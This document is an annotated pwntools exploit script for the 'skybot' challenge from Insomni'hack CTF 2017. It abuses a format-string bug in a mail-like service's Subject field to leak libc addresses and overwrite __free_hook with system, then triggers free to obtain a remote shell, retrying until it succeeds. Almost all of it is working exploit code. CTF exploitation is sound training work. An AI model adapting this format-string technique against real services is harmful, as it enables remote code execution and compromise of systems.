Exploit script for skybot (Insomni'hack CTF 2017)
#!/usr/bin/python
from pwn import *
import time
def recv_menu():
    """Consume the service's reply up to and including the next ``'>>> '`` prompt.

    Reads from the module-level connection ``s`` and returns whatever
    ``s.recvuntil`` returns, so a caller can inspect the menu text if needed.
    """
    prompt = '>>> '
    return s.recvuntil(prompt)
def leak():
    """Leak a libc pointer through the Subject format string and derive the
    addresses the rest of the script needs.

    Sets the module-level ``libc`` (libc base), ``target`` (logged as
    ``__free_hook``) and ``system``.  ``binary`` is declared global but never
    assigned here.  The three offsets below are hard-coded for the libc build
    shipped with the challenge; they are not computed from anything.
    """
    global libc
    global binary
    global target
    global system
    log.info('leaking stuff')
    # Authenticate with a NUL-terminated name followed by padding.  The padding
    # presumably fills the stored name buffer to a fixed size; that cannot be
    # confirmed from this script alone.
    s.sendline('auth brun\x00AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA')
    recv_menu()
    # Compose a message.  The Subject field is what the service formats back
    # (the reply below contains the '%p' values), so it carries the payload.
    s.sendline('send')
    s.recvuntil('To: ')
    s.send('BBBB')
    s.recvuntil('From: ')
    s.send('CCCC')
    s.recvuntil('Subject: ')
    # 17 '%p' conversions separated by '-' dump 17 words as hex pointers.
    s.send('%p-'*17)
    # Discard the first chunk of the reply (assumed to be output preceding the
    # formatted subject) and split the next chunk on the '-' separators.
    s.recv(1024)
    leak = s.recv(1024).split('-')  # NOTE: this local shadows the function name
    # Element 1 of the split chunk is the word that points into libc.
    log.info('got libc pointer 0x%08x' % int(leak[1], 16))
    # Fixed distance of that pointer from the libc base in the challenge's libc.
    libc = int(leak[1], 16) - 0x3c5780
    log.info('libc base at %08x' % libc)
    # Address the next stage writes to (logged as __free_hook).
    target = libc + 0x3c57a8
    log.info('target (__free_hook) at 0x%08x' % target)
    # Value the next stage writes there.
    system = libc + 0x45390
def write_free_hook():
    """Write the address of ``system`` over ``target`` (``__free_hook``) with
    three ``%hn`` halfword writes through the same Subject format string.

    Reads the module-level ``system`` and ``target`` set by ``leak()``.  The
    pointers written through are planted in the 'To:' field and referenced by
    position (``%10$hn`` .. ``%12$hn``), so the argument indices depend on the
    challenge's exact stack layout.
    """
    log.info('overwriting __free_hook with system at 0x%08x' % system)
    # Split the address into 16-bit pieces by slicing its hex text:
    # bits 0-15, 16-31 and 32-47.  Assumes hex(system) has at least 12 hex
    # digits (true for a typical 0x7f........ userland address); with fewer
    # digits the third slice would include the '0x' prefix and int() would fail.
    system_01 = int(hex(system)[-4:], 16)
    system_23 = int(hex(system)[-8:-4], 16)
    system_45 = int(hex(system)[-12:-8], 16)
    s.sendline('send')
    s.recvuntil('To: ')
    # Four 8-byte pointers target+0/+2/+4/+6; only the first three are used
    # (positional arguments 10, 11 and 12 below).
    s.send(p64(target) + p64(target + 2) + p64(target + 4) + p64(target + 6))
    s.recvuntil('From: ')
    s.send('B'*8)
    s.recvuntil('Subject: ')
    # %hn stores the number of characters printed so far, truncated to 16 bits.
    # Each '%<width>x' pads the running total up to the next halfword value:
    #   after the 1st: system_01                         -> target
    #   after the 2nd: system_01 + second == system_23   -> target + 2
    #   after the 3rd: 0x10000 + system_45 == system_45  -> target + 4
    # (all modulo 0x10000).  'second' is (system_23 - system_01) mod 0x10000
    # spelled out as a conditional.
    second = 0x10000 + system_23 - system_01 if system_23 - system_01 < 0 else system_23 - system_01
    # Trailing NUL terminates the format string.  '%<width>x' prints *at least*
    # width characters, so the totals above assume each consumed argument fits
    # in its field.
    s.sendline('%' + str(system_01) + 'x%10$hn' + '%' + str(second) + 'x%11$hn' + '%' + str(0x10000 + system_45 - (second + system_01)) + 'x%12$hn\x00')
    recv_menu()
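s = None
# Retry until the whole chain succeeds: a failed leak or a dropped connection
# raises inside the try body and the loop reconnects from scratch.
while 1:
    try:
        s = remote('127.0.0.1', 4444)
        #s = remote('skybot.insomni.hack', 1337)
        recv_menu()
        leak()
        write_free_hook()
        # at this point __free_hook has been overwritten with the address of system, let's force the program into calling free on our buffer which contains sh
        s.sendline('auth sh')
        recv_menu()
        s.sendline('reset')
        log.info('pwned, enjoy your shell!')
        s.interactive()
        break
    except Exception:
        # `except Exception` rather than a bare `except:` so KeyboardInterrupt
        # and SystemExit still stop the script instead of being retried forever.
        log.info('exploit failed, retrying')
        # Release the half-used connection before opening a new one; the
        # original retry leaked one socket per failed attempt.
        if s is not None:
            s.close()
            s = None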